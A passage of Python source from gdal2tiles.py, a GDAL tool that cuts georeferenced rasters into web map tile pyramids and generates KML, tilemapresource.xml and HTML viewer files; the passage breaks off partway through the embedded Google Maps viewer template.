tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz] tcount += (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy)) ti = 0 if tcount == 0: return if not options.quiet: print("Generating Overview Tiles:") progress_bar = ProgressBar(tcount) progress_bar.start() for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1): tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz] for ty in range(tmaxy, tminy - 1, -1): for tx in range(tminx, tmaxx + 1): ti += 1 tilefilename = os.path.join(output_folder, str(tz), str(tx), "%s.%s" % (ty, tile_job_info.tile_extension)) if options.verbose: print(ti, '/', tcount, tilefilename) if options.resume and os.path.exists(tilefilename): if options.verbose: print("Tile generation skipped because of --resume") else: progress_bar.log_progress() continue # Create directories for the tile if not os.path.exists(os.path.dirname(tilefilename)): os.makedirs(os.path.dirname(tilefilename)) dsquery = mem_driver.Create('', 2 * tile_job_info.tile_size, 2 * tile_job_info.tile_size, tilebands) # TODO: fill the null value dstile = mem_driver.Create('', tile_job_info.tile_size, tile_job_info.tile_size, tilebands) # TODO: Implement more clever walking on the tiles with cache functionality # probably walk should start with reading of four tiles from top left corner # Hilbert curve children = [] # Read the tiles and write them to query window for y in range(2 * ty, 2 * ty + 2): for x in range(2 * tx, 2 * tx + 2): minx, miny, maxx, maxy = tile_job_info.tminmax[tz + 1] if x >= minx and x <= maxx and y >= miny and y <= maxy: dsquerytile = gdal.Open( os.path.join(output_folder, str(tz + 1), str(x), "%s.%s" % (y, tile_job_info.tile_extension)), gdal.GA_ReadOnly) if (ty == 0 and y == 1) or (ty != 0 and (y % (2 * ty)) != 0): tileposy = 0 else: tileposy = tile_job_info.tile_size if tx: tileposx = x % (2 * tx) * tile_job_info.tile_size elif tx == 0 and x == 1: tileposx = tile_job_info.tile_size else: tileposx = 0 dsquery.WriteRaster( tileposx, tileposy, tile_job_info.tile_size, tile_job_info.tile_size, dsquerytile.ReadRaster(0, 0, tile_job_info.tile_size, tile_job_info.tile_size), band_list=list(range(1, tilebands + 1))) children.append([x, y, tz + 1]) scale_query_to_tile(dsquery, dstile, tile_driver, options, tilefilename=tilefilename) # Write a copy of tile to png/jpg if options.resampling != 'antialias': # Write a copy of tile to png/jpg out_driver.CreateCopy(tilefilename, dstile, strict=0) if options.verbose: print("\tbuild from zoom", tz + 1, " tiles:", (2 * tx, 2 * ty), (2 * tx + 1, 2 * ty), (2 * tx, 2 * ty + 1), (2 * tx + 1, 2 * ty + 1)) # Create a KML file for this tile. if tile_job_info.kml: with open(os.path.join( output_folder, '%d/%d/%d.kml' % (tz, tx, ty) ), 'wb') as f: f.write(generate_kml( tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size, get_tile_swne(tile_job_info, options), options, children ).encode('utf-8')) if not options.verbose and not options.quiet: progress_bar.log_progress() def optparse_init(): """Prepare the option parser for input (argv)""" from optparse import OptionParser, OptionGroup usage = "Usage: %prog [options] input_file [output]" p = OptionParser(usage, version="%prog " + __version__) p.add_option("-p", "--profile", dest='profile', type='choice', choices=profile_list, help=("Tile cutting profile (%s) - default 'mercator' " "(Google Maps compatible)" % ",".join(profile_list))) p.add_option("-r", "--resampling", dest="resampling", type='choice', choices=resampling_list, help="Resampling method (%s) - default 'average'" % ",".join(resampling_list)) p.add_option('-s', '--s_srs', dest="s_srs", metavar="SRS", help="The spatial reference system used for the source input data") p.add_option('-z', '--zoom', dest="zoom", help="Zoom levels to render (format:'2-5' or '10').") p.add_option('-e', '--resume', dest="resume", action="store_true", help="Resume mode. Generate only missing files.") p.add_option('-a', '--srcnodata', dest="srcnodata", metavar="NODATA", help="NODATA transparency value to assign to the input data") p.add_option('-d', '--tmscompatible', dest="tmscompatible", action="store_true", help=("When using the geodetic profile, specifies the base resolution " "as 0.703125 or 2 tiles at zoom level 0.")) p.add_option("-v", "--verbose", action="store_true", dest="verbose", help="Print status messages to stdout") p.add_option("-q", "--quiet", action="store_true", dest="quiet", help="Disable messages and status to stdout") p.add_option("--processes", dest="nb_processes", type='int', help="Number of processes to use for tiling") # KML options g = OptionGroup(p, "KML (Google Earth) options", "Options for generated Google Earth SuperOverlay metadata") g.add_option("-k", "--force-kml", dest='kml', action="store_true", help=("Generate KML for Google Earth - default for 'geodetic' profile and " "'raster' in EPSG:4326. For a dataset with different projection use " "with caution!")) g.add_option("-n", "--no-kml", dest='kml', action="store_false", help="Avoid automatic generation of KML files for EPSG:4326") g.add_option("-u", "--url", dest='url', help="URL address where the generated tiles are going to be published") p.add_option_group(g) # HTML options g = OptionGroup(p, "Web viewer options", "Options for generated HTML viewers a la Google Maps") g.add_option("-w", "--webviewer", dest='webviewer', type='choice', choices=webviewer_list, help="Web viewer to generate (%s) - default 'all'" % ",".join(webviewer_list)) g.add_option("-t", "--title", dest='title', help="Title of the map") g.add_option("-c", "--copyright", dest='copyright', help="Copyright for the map") g.add_option("-g", "--googlekey", dest='googlekey', help="Google Maps API key from http://code.google.com/apis/maps/signup.html") g.add_option("-b", "--bingkey", dest='bingkey', help="Bing Maps API key from https://www.bingmapsportal.com/") p.add_option_group(g) p.set_defaults(verbose=False, profile="mercator", kml=False, url='', webviewer='all', copyright='', resampling='average', resume=False, googlekey='INSERT_YOUR_KEY_HERE', bingkey='INSERT_YOUR_KEY_HERE', processes=1) return p def process_args(argv): parser = optparse_init() options, args = parser.parse_args(args=argv) # Args should be either an input file OR an input file and an output folder if (len(args) == 0): exit_with_error("You need to specify at least an input file as argument to the script") if (len(args) > 2): exit_with_error("Processing of several input files is not supported.", "Please first use a tool like gdal_vrtmerge.py or gdal_merge.py on the " "files: gdal_vrtmerge.py -o merged.vrt %s" % " ".join(args)) input_file = args[0] if not os.path.isfile(input_file): exit_with_error("The provided input file %s does not exist or is not a file" % input_file) if len(args) == 2: output_folder = args[1] else: output_folder = os.path.basename(input_file) options = options_post_processing(options, input_file, output_folder) return input_file, output_folder, options def options_post_processing(options, input_file, output_folder): if not options.title: options.title = os.path.basename(input_file) if options.url and not options.url.endswith('/'): options.url += '/' if options.url: out_path = output_folder if out_path.endswith("/"): out_path = out_path[:-1] options.url += os.path.basename(out_path) + '/' # Supported options if options.resampling == 'average': try: if gdal.RegenerateOverview: pass except Exception: exit_with_error("'average' resampling algorithm is not available.", "Please use -r 'near' argument or upgrade to newer version of GDAL.") elif options.resampling == 'antialias': try: if numpy: # pylint:disable=W0125 pass except Exception: exit_with_error("'antialias' resampling algorithm is not available.", "Install PIL (Python Imaging Library) and numpy.") try: os.path.basename(input_file).encode('ascii') except UnicodeEncodeError: full_ascii = False else: full_ascii = True # LC_CTYPE check if not full_ascii and 'UTF-8' not in os.environ.get("LC_CTYPE", ""): if not options.quiet: print("\nWARNING: " "You are running gdal2tiles.py with a LC_CTYPE environment variable that is " "not UTF-8 compatible, and your input file contains non-ascii characters. " "The generated sample googlemaps, openlayers or " "leaflet files might contain some invalid characters as a result\n") # Output the results if options.verbose: print("Options:", options) print("Input:", input_file) print("Output:", output_folder) print("Cache: %s MB" % (gdal.GetCacheMax() / 1024 / 1024)) print('') return options class TileDetail(object): tx = 0 ty = 0 tz = 0 rx = 0 ry = 0 rxsize = 0 rysize = 0 wx = 0 wy = 0 wxsize = 0 wysize = 0 querysize = 0 def __init__(self, **kwargs): for key in kwargs: if hasattr(self, key): setattr(self, key, kwargs[key]) def __unicode__(self): return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz) def __str__(self): return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz) def __repr__(self): return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz) class TileJobInfo(object): """ Plain object to hold tile job configuration for a dataset """ src_file = "" nb_data_bands = 0 output_file_path = "" tile_extension = "" tile_size = 0 tile_driver = None kml = False tminmax = [] tminz = 0 tmaxz = 0 in_srs_wkt = 0 out_geo_trans = [] ominy = 0 is_epsg_4326 = False options = None def __init__(self, **kwargs): for key in kwargs: if hasattr(self, key): setattr(self, key, kwargs[key]) def __unicode__(self): return "TileJobInfo %s\n" % (self.src_file) def __str__(self): return "TileJobInfo %s\n" % (self.src_file) def __repr__(self): return "TileJobInfo %s\n" % (self.src_file) class Gdal2TilesError(Exception): pass class GDAL2Tiles(object): def __init__(self, input_file, output_folder, options): """Constructor function - initialization""" self.out_drv = None self.mem_drv = None self.warped_input_dataset = None self.out_srs = None self.nativezoom = None self.tminmax = None self.tsize = None self.mercator = None self.geodetic = None self.alphaband = None self.dataBandsCount = None self.out_gt = None self.tileswne = None self.swne = None self.ominx = None self.omaxx = None self.omaxy = None self.ominy = None self.input_file = None self.output_folder = None # Tile format self.tilesize = 256 self.tiledriver = 'PNG' self.tileext = 'png' self.tmp_dir = tempfile.mkdtemp() self.tmp_vrt_filename = os.path.join(self.tmp_dir, str(uuid4()) + '.vrt') # Should we read bigger window of the input raster and scale it down? # Note: Modified later by open_input() # Not for 'near' resampling # Not for Wavelet based drivers (JPEG2000, ECW, MrSID) # Not for 'raster' profile self.scaledquery = True # How big should be query window be for scaling down # Later on reset according the chosen resampling algorightm self.querysize = 4 * self.tilesize # Should we use Read on the input file for generating overview tiles? # Note: Modified later by open_input() # Otherwise the overview tiles are generated from existing underlying tiles self.overviewquery = False self.input_file = input_file self.output_folder = output_folder self.options = options if self.options.resampling == 'near': self.querysize = self.tilesize elif self.options.resampling == 'bilinear': self.querysize = self.tilesize * 2 # User specified zoom levels self.tminz = None self.tmaxz = None if self.options.zoom: minmax = self.options.zoom.split('-', 1) minmax.extend(['']) zoom_min, zoom_max = minmax[:2] self.tminz = int(zoom_min) if zoom_max: self.tmaxz = int(zoom_max) else: self.tmaxz = int(zoom_min) # KML generation self.kml = self.options.kml # ------------------------------------------------------------------------- def open_input(self): """Initialization of the input raster, reprojection if necessary""" gdal.AllRegister() self.out_drv = gdal.GetDriverByName(self.tiledriver) self.mem_drv = gdal.GetDriverByName('MEM') if not self.out_drv: raise Exception("The '%s' driver was not found, is it available in this GDAL build?", self.tiledriver) if not self.mem_drv: raise Exception("The 'MEM' driver was not found, is it available in this GDAL build?") # Open the input file if self.input_file: input_dataset = gdal.Open(self.input_file, gdal.GA_ReadOnly) else: raise Exception("No input file was specified") if self.options.verbose: print("Input file:", "( %sP x %sL - %s bands)" % (input_dataset.RasterXSize, input_dataset.RasterYSize, input_dataset.RasterCount)) if not input_dataset: # Note: GDAL prints the ERROR message too exit_with_error("It is not possible to open the input file '%s'." % self.input_file) # Read metadata from the input file if input_dataset.RasterCount == 0: exit_with_error("Input file '%s' has no raster band" % self.input_file) if input_dataset.GetRasterBand(1).GetRasterColorTable(): exit_with_error( "Please convert this file to RGB/RGBA and run gdal2tiles on the result.", "From paletted file you can create RGBA file (temp.vrt) by:\n" "gdal_translate -of vrt -expand rgba %s temp.vrt\n" "then run:\n" "gdal2tiles temp.vrt" % self.input_file ) in_nodata = setup_no_data_values(input_dataset, self.options) if self.options.verbose: print("Preprocessed file:", "( %sP x %sL - %s bands)" % (input_dataset.RasterXSize, input_dataset.RasterYSize, input_dataset.RasterCount)) in_srs, self.in_srs_wkt = setup_input_srs(input_dataset, self.options) self.out_srs = setup_output_srs(in_srs, self.options) # If input and output reference systems are different, we reproject the input dataset into # the output reference system for easier manipulation self.warped_input_dataset = None if self.options.profile in ('mercator', 'geodetic'): if not in_srs: exit_with_error( "Input file has unknown SRS.", "Use --s_srs ESPG:xyz (or similar) to provide source reference system.") if not has_georeference(input_dataset): exit_with_error( "There is no georeference - neither affine transformation (worldfile) " "nor GCPs. You can generate only 'raster' profile tiles.", "Either gdal2tiles with parameter -p 'raster' or use another GIS " "software for georeference e.g. gdal_transform -gcp / -a_ullr / -a_srs" ) if ((in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or (input_dataset.GetGCPCount() != 0)): self.warped_input_dataset = reproject_dataset( input_dataset, in_srs, self.out_srs) if in_nodata: self.warped_input_dataset = update_no_data_values( self.warped_input_dataset, in_nodata, options=self.options) else: self.warped_input_dataset = update_alpha_value_for_non_alpha_inputs( self.warped_input_dataset, options=self.options) if self.warped_input_dataset and self.options.verbose: print("Projected file:", "tiles.vrt", "( %sP x %sL - %s bands)" % ( self.warped_input_dataset.RasterXSize, self.warped_input_dataset.RasterYSize, self.warped_input_dataset.RasterCount)) if not self.warped_input_dataset: self.warped_input_dataset = input_dataset self.warped_input_dataset.GetDriver().CreateCopy(self.tmp_vrt_filename, self.warped_input_dataset) # Get alpha band (either directly or from NODATA value) self.alphaband = self.warped_input_dataset.GetRasterBand(1).GetMaskBand() self.dataBandsCount = nb_data_bands(self.warped_input_dataset) # KML test self.isepsg4326 = False srs4326 = osr.SpatialReference() srs4326.ImportFromEPSG(4326) if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4(): self.kml = True self.isepsg4326 = True if self.options.verbose: print("KML autotest OK!") # Read the georeference self.out_gt = self.warped_input_dataset.GetGeoTransform() # Test the size of the pixel # Report error in case rotation/skew is in geotransform (possible only in 'raster' profile) if (self.out_gt[2], self.out_gt[4]) != (0, 0): exit_with_error("Georeference of the raster contains rotation or skew. " "Such raster is not supported. Please use gdalwarp first.") # Here we expect: pixel is square, no rotation on the raster # Output Bounds - coordinates in the output SRS self.ominx = self.out_gt[0] self.omaxx = self.out_gt[0] + self.warped_input_dataset.RasterXSize * self.out_gt[1] self.omaxy = self.out_gt[3] self.ominy = self.out_gt[3] - self.warped_input_dataset.RasterYSize * self.out_gt[1] # Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15 if self.options.verbose: print("Bounds (output srs):", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy) # Calculating ranges for tiles in different zoom levels if self.options.profile == 'mercator': self.mercator = GlobalMercator() # Function which generates SWNE in LatLong for given tile self.tileswne = self.mercator.TileLatLonBounds # Generate table with min max tile coordinates for all zoomlevels self.tminmax = list(range(0, 32)) for tz in range(0, 32): tminx, tminy = self.mercator.MetersToTile(self.ominx, self.ominy, tz) tmaxx, tmaxy = self.mercator.MetersToTile(self.omaxx, self.omaxy, tz) # crop tiles extending world limits (+-180,+-90) tminx, tminy = max(0, tminx), max(0, tminy) tmaxx, tmaxy = min(2**tz - 1, tmaxx), min(2**tz - 1, tmaxy) self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy) # TODO: Maps crossing 180E (Alaska?) # Get the minimal zoom level (map covers area equivalent to one tile) if self.tminz is None: self.tminz = self.mercator.ZoomForPixelSize( self.out_gt[1] * max(self.warped_input_dataset.RasterXSize, self.warped_input_dataset.RasterYSize) / float(self.tilesize)) # Get the maximal zoom level # (closest possible zoom level up on the resolution of raster) if self.tmaxz is None: self.tmaxz = self.mercator.ZoomForPixelSize(self.out_gt[1]) if self.options.verbose: print("Bounds (latlong):", self.mercator.MetersToLatLon(self.ominx, self.ominy), self.mercator.MetersToLatLon(self.omaxx, self.omaxy)) print('MinZoomLevel:', self.tminz) print("MaxZoomLevel:", self.tmaxz, "(", self.mercator.Resolution(self.tmaxz), ")") if self.options.profile == 'geodetic': self.geodetic = GlobalGeodetic(self.options.tmscompatible) # Function which generates SWNE in LatLong for given tile self.tileswne = self.geodetic.TileLatLonBounds # Generate table with min max tile coordinates for all zoomlevels self.tminmax = list(range(0, 32)) for tz in range(0, 32): tminx, tminy = self.geodetic.LonLatToTile(self.ominx, self.ominy, tz) tmaxx, tmaxy = self.geodetic.LonLatToTile(self.omaxx, self.omaxy, tz) # crop tiles extending world limits (+-180,+-90) tminx, tminy = max(0, tminx), max(0, tminy) tmaxx, tmaxy = min(2**(tz + 1) - 1, tmaxx), min(2**tz - 1, tmaxy) self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy) # TODO: Maps crossing 180E (Alaska?) # Get the maximal zoom level # (closest possible zoom level up on the resolution of raster) if self.tminz is None: self.tminz = self.geodetic.ZoomForPixelSize( self.out_gt[1] * max(self.warped_input_dataset.RasterXSize, self.warped_input_dataset.RasterYSize) / float(self.tilesize)) # Get the maximal zoom level # (closest possible zoom level up on the resolution of raster) if self.tmaxz is None: self.tmaxz = self.geodetic.ZoomForPixelSize(self.out_gt[1]) if self.options.verbose: print("Bounds (latlong):", self.ominx, self.ominy, self.omaxx, self.omaxy) if self.options.profile == 'raster': def log2(x): return math.log10(x) / math.log10(2) self.nativezoom = int( max(math.ceil(log2(self.warped_input_dataset.RasterXSize / float(self.tilesize))), math.ceil(log2(self.warped_input_dataset.RasterYSize / float(self.tilesize))))) if self.options.verbose: print("Native zoom of the raster:", self.nativezoom) # Get the minimal zoom level (whole raster in one tile) if self.tminz is None: self.tminz = 0 # Get the maximal zoom level (native resolution of the raster) if self.tmaxz is None: self.tmaxz = self.nativezoom # Generate table with min max tile coordinates for all zoomlevels self.tminmax = list(range(0, self.tmaxz + 1)) self.tsize = list(range(0, self.tmaxz + 1)) for tz in range(0, self.tmaxz + 1): tsize = 2.0**(self.nativezoom - tz) * self.tilesize tminx, tminy = 0, 0 tmaxx = int(math.ceil(self.warped_input_dataset.RasterXSize / tsize)) - 1 tmaxy = int(math.ceil(self.warped_input_dataset.RasterYSize / tsize)) - 1 self.tsize[tz] = math.ceil(tsize) self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy) # Function which generates SWNE in LatLong for given tile if self.kml and self.in_srs_wkt: ct = osr.CoordinateTransformation(in_srs, srs4326) def rastertileswne(x, y, z): pixelsizex = (2**(self.tmaxz - z) * self.out_gt[1]) # X-pixel size in level west = self.out_gt[0] + x * self.tilesize * pixelsizex east = west + self.tilesize * pixelsizex south = self.ominy + y * self.tilesize * pixelsizex north = south + self.tilesize * pixelsizex if not self.isepsg4326: # Transformation to EPSG:4326 (WGS84 datum) west, south = ct.TransformPoint(west, south)[:2] east, north = ct.TransformPoint(east, north)[:2] return south, west, north, east self.tileswne = rastertileswne else: self.tileswne = lambda x, y, z: (0, 0, 0, 0) # noqa def generate_metadata(self): """ Generation of main metadata files and HTML viewers (metadata related to particular tiles are generated during the tile processing). """ if not os.path.exists(self.output_folder): os.makedirs(self.output_folder) if self.options.profile == 'mercator': south, west = self.mercator.MetersToLatLon(self.ominx, self.ominy) north, east = self.mercator.MetersToLatLon(self.omaxx, self.omaxy) south, west = max(-85.05112878, south), max(-180.0, west) north, east = min(85.05112878, north), min(180.0, east) self.swne = (south, west, north, east) # Generate googlemaps.html if self.options.webviewer in ('all', 'google') and self.options.profile == 'mercator': if (not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'googlemaps.html'))): with open(os.path.join(self.output_folder, 'googlemaps.html'), 'wb') as f: f.write(self.generate_googlemaps().encode('utf-8')) # Generate openlayers.html if self.options.webviewer in ('all', 'openlayers'): if (not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))): with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f: f.write(self.generate_openlayers().encode('utf-8')) # Generate leaflet.html if self.options.webviewer in ('all', 'leaflet'): if (not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'leaflet.html'))): with open(os.path.join(self.output_folder, 'leaflet.html'), 'wb') as f: f.write(self.generate_leaflet().encode('utf-8')) elif self.options.profile == 'geodetic': west, south = self.ominx, self.ominy east, north = self.omaxx, self.omaxy south, west = max(-90.0, south), max(-180.0, west) north, east = min(90.0, north), min(180.0, east) self.swne = (south, west, north, east) # Generate openlayers.html if self.options.webviewer in ('all', 'openlayers'): if (not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))): with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f: f.write(self.generate_openlayers().encode('utf-8')) elif self.options.profile == 'raster': west, south = self.ominx, self.ominy east, north = self.omaxx, self.omaxy self.swne = (south, west, north, east) # Generate openlayers.html if self.options.webviewer in ('all', 'openlayers'): if (not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))): with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f: f.write(self.generate_openlayers().encode('utf-8')) # Generate tilemapresource.xml. if not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'tilemapresource.xml')): with open(os.path.join(self.output_folder, 'tilemapresource.xml'), 'wb') as f: f.write(self.generate_tilemapresource().encode('utf-8')) if self.kml: # TODO: Maybe problem for not automatically generated tminz # The root KML should contain links to all tiles in the tminz level children = [] xmin, ymin, xmax, ymax = self.tminmax[self.tminz] for x in range(xmin, xmax + 1): for y in range(ymin, ymax + 1): children.append([x, y, self.tminz]) # Generate Root KML if self.kml: if (not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'doc.kml'))): with open(os.path.join(self.output_folder, 'doc.kml'), 'wb') as f: f.write(generate_kml( None, None, None, self.tileext, self.tilesize, self.tileswne, self.options, children ).encode('utf-8')) def generate_base_tiles(self): """ Generation of the base tiles (the lowest in the pyramid) directly from the input raster """ if not self.options.quiet: print("Generating Base Tiles:") if self.options.verbose: print('') print("Tiles generated from the max zoom level:") print("----------------------------------------") print('') # Set the bounds tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz] ds = self.warped_input_dataset tilebands = self.dataBandsCount + 1 querysize = self.querysize if self.options.verbose: print("dataBandsCount: ", self.dataBandsCount) print("tilebands: ", tilebands) tcount = (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy)) ti = 0 tile_details = [] tz = self.tmaxz for ty in range(tmaxy, tminy - 1, -1): for tx in range(tminx, tmaxx + 1): ti += 1 tilefilename = os.path.join( self.output_folder, str(tz), str(tx), "%s.%s" % (ty, self.tileext)) if self.options.verbose: print(ti, '/', tcount, tilefilename) if self.options.resume and os.path.exists(tilefilename): if self.options.verbose: print("Tile generation skipped because of --resume") continue # Create directories for the tile if not os.path.exists(os.path.dirname(tilefilename)): os.makedirs(os.path.dirname(tilefilename)) if self.options.profile == 'mercator': # Tile bounds in EPSG:3857 b = self.mercator.TileBounds(tx, ty, tz) elif self.options.profile == 'geodetic': b = self.geodetic.TileBounds(tx, ty, tz) # Don't scale up by nearest neighbour, better change the querysize # to the native resolution (and return smaller query tile) for scaling if self.options.profile in ('mercator', 'geodetic'): rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1]) # Pixel size in the raster covering query geo extent nativesize = wb[0] + wb[2] if self.options.verbose: print("\tNative Extent (querysize", nativesize, "): ", rb, wb) # Tile bounds in raster coordinates for ReadRaster query rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1], querysize=querysize) rx, ry, rxsize, rysize = rb wx, wy, wxsize, wysize = wb else: # 'raster' profile: tsize = int(self.tsize[tz]) # tilesize in raster coordinates for actual zoom xsize = self.warped_input_dataset.RasterXSize # size of the raster in pixels ysize = self.warped_input_dataset.RasterYSize if tz >= self.nativezoom: querysize = self.tilesize rx = (tx) * tsize rxsize = 0 if tx == tmaxx: rxsize = xsize % tsize if rxsize == 0: rxsize = tsize rysize = 0 if ty == tmaxy: rysize = ysize % tsize if rysize == 0: rysize = tsize ry = ysize - (ty * tsize) - rysize wx, wy = 0, 0 wxsize = int(rxsize / float(tsize) * self.tilesize) wysize = int(rysize / float(tsize) * self.tilesize) if wysize != self.tilesize: wy = self.tilesize - wysize # Read the source raster if anything is going inside the tile as per the computed # geo_query tile_details.append( TileDetail( tx=tx, ty=ty, tz=tz, rx=rx, ry=ry, rxsize=rxsize, rysize=rysize, wx=wx, wy=wy, wxsize=wxsize, wysize=wysize, querysize=querysize, ) ) conf = TileJobInfo( src_file=self.tmp_vrt_filename, nb_data_bands=self.dataBandsCount, output_file_path=self.output_folder, tile_extension=self.tileext, tile_driver=self.tiledriver, tile_size=self.tilesize, kml=self.kml, tminmax=self.tminmax, tminz=self.tminz, tmaxz=self.tmaxz, in_srs_wkt=self.in_srs_wkt, out_geo_trans=self.out_gt, ominy=self.ominy, is_epsg_4326=self.isepsg4326, options=self.options, ) return conf, tile_details def geo_query(self, ds, ulx, uly, lrx, lry, querysize=0): """ For given dataset and query in cartographic coordinates returns parameters for ReadRaster() in raster coordinates and x/y shifts (for border tiles). If the querysize is not given, the extent is returned in the native resolution of dataset ds. raises Gdal2TilesError if the dataset does not contain anything inside this geo_query """ geotran = ds.GetGeoTransform() rx = int((ulx - geotran[0]) / geotran[1] + 0.001) ry = int((uly - geotran[3]) / geotran[5] + 0.001) rxsize = int((lrx - ulx) / geotran[1] + 0.5) rysize = int((lry - uly) / geotran[5] + 0.5) if not querysize: wxsize, wysize = rxsize, rysize else: wxsize, wysize = querysize, querysize # Coordinates should not go out of the bounds of the raster wx = 0 if rx < 0: rxshift = abs(rx) wx = int(wxsize * (float(rxshift) / rxsize)) wxsize = wxsize - wx rxsize = rxsize - int(rxsize * (float(rxshift) / rxsize)) rx = 0 if rx + rxsize > ds.RasterXSize: wxsize = int(wxsize * (float(ds.RasterXSize - rx) / rxsize)) rxsize = ds.RasterXSize - rx wy = 0 if ry < 0: ryshift = abs(ry) wy = int(wysize * (float(ryshift) / rysize)) wysize = wysize - wy rysize = rysize - int(rysize * (float(ryshift) / rysize)) ry = 0 if ry + rysize > ds.RasterYSize: wysize = int(wysize * (float(ds.RasterYSize - ry) / rysize)) rysize = ds.RasterYSize - ry return (rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize) def generate_tilemapresource(self): """ Template for tilemapresource.xml. Returns filled string. Expected variables: title, north, south, east, west, isepsg4326, projection, publishurl, zoompixels, tilesize, tileformat, profile """ args = {} args['title'] = self.options.title args['south'], args['west'], args['north'], args['east'] = self.swne args['tilesize'] = self.tilesize args['tileformat'] = self.tileext args['publishurl'] = self.options.url args['profile'] = self.options.profile if self.options.profile == 'mercator': args['srs'] = "EPSG:3857" elif self.options.profile == 'geodetic': args['srs'] = "EPSG:4326" elif self.options.s_srs: args['srs'] = self.options.s_srs elif self.out_srs: args['srs'] = self.out_srs.ExportToWkt() else: args['srs'] = "" s = """<?xml version="1.0" encoding="utf-8"?> <TileMap version="1.0.0" tilemapservice="http://tms.osgeo.org/1.0.0"> <Title>%(title)s</Title> <Abstract></Abstract> <SRS>%(srs)s</SRS> <BoundingBox minx="%(west).14f" miny="%(south).14f" maxx="%(east).14f" maxy="%(north).14f"/> <Origin x="%(west).14f" y="%(south).14f"/> <TileFormat width="%(tilesize)d" height="%(tilesize)d" mime-type="image/%(tileformat)s" extension="%(tileformat)s"/> <TileSets profile="%(profile)s"> """ % args # noqa for z in range(self.tminz, self.tmaxz + 1): if self.options.profile == 'raster': s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % ( args['publishurl'], z, (2**(self.nativezoom - z) * self.out_gt[1]), z) elif self.options.profile == 'mercator': s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % ( args['publishurl'], z, 156543.0339 / 2**z, z) elif self.options.profile == 'geodetic': s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % ( args['publishurl'], z, 0.703125 / 2**z, z) s += """ </TileSets> </TileMap> """ return s def generate_googlemaps(self): """ Template for googlemaps.html implementing Overlay of tiles for 'mercator' profile. It returns filled string. Expected variables: title, googlemapskey, north, south, east, west, minzoom, maxzoom, tilesize, tileformat, publishurl """ args = {} args['title'] = self.options.title args['googlemapskey'] = self.options.googlekey args['south'], args['west'], args['north'], args['east'] = self.swne args['minzoom'] = self.tminz args['maxzoom'] = self.tmaxz args['tilesize'] = self.tilesize args['tileformat'] = self.tileext args['publishurl'] = self.options.url args['copyright'] = self.options.copyright s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <title>%(title)s</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"/> <meta http-equiv='imagetoolbar' content='no'/> <style type="text/css"> v\:* {behavior:url(#default#VML);} html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; } body { margin: 10px; background: #fff; } h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; } #header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; } #subheader { height: 12px; text-align: right; font-size: 10px; color: #555;} #map { height: 95%%; border: 1px solid #888; } </style> <script src='http://maps.google.com/maps?file=api&amp;v=2&amp;key=%(googlemapskey)s'></script> <script> //<![CDATA[ /* * Constants for given map * TODO: read it from tilemapresource.xml */ var mapBounds = new GLatLngBounds(new GLatLng(%(south)s, %(west)s), new GLatLng(%(north)s, %(east)s)); var mapMinZoom = %(minzoom)s; var mapMaxZoom = %(maxzoom)s; var opacity = 0.75; var map; var hybridOverlay; /* * Create a Custom Opacity GControl * http://www.maptiler.org/google-maps-overlay-opacity-control/ */ var CTransparencyLENGTH = 58; // maximum width that the knob can move (slide width minus knob width) function CTransparencyControl( overlay ) { this.overlay = overlay; this.opacity = overlay.getTileLayer().getOpacity(); } CTransparencyControl.prototype = new GControl(); // This function positions the slider to match the specified opacity CTransparencyControl.prototype.setSlider = function(pos) { var left = Math.round((CTransparencyLENGTH*pos)); this.slide.left = left; this.knob.style.left = left+"px"; this.knob.style.top = "0px"; } // This function reads the slider and sets the overlay opacity level CTransparencyControl.prototype.setOpacity = function() { // set the global variable opacity = this.slide.left/CTransparencyLENGTH; this.map.clearOverlays(); this.map.addOverlay(this.overlay, { zPriority: 0 }); if (this.map.getCurrentMapType() == G_HYBRID_MAP) { this.map.addOverlay(hybridOverlay); } } // This gets called by the API when addControl(new CTransparencyControl()) CTransparencyControl.prototype.initialize = function(map) { var that=this; this.map = map; // Is this MSIE, if so we need to use AlphaImageLoader var agent = navigator.userAgent.toLowerCase(); if 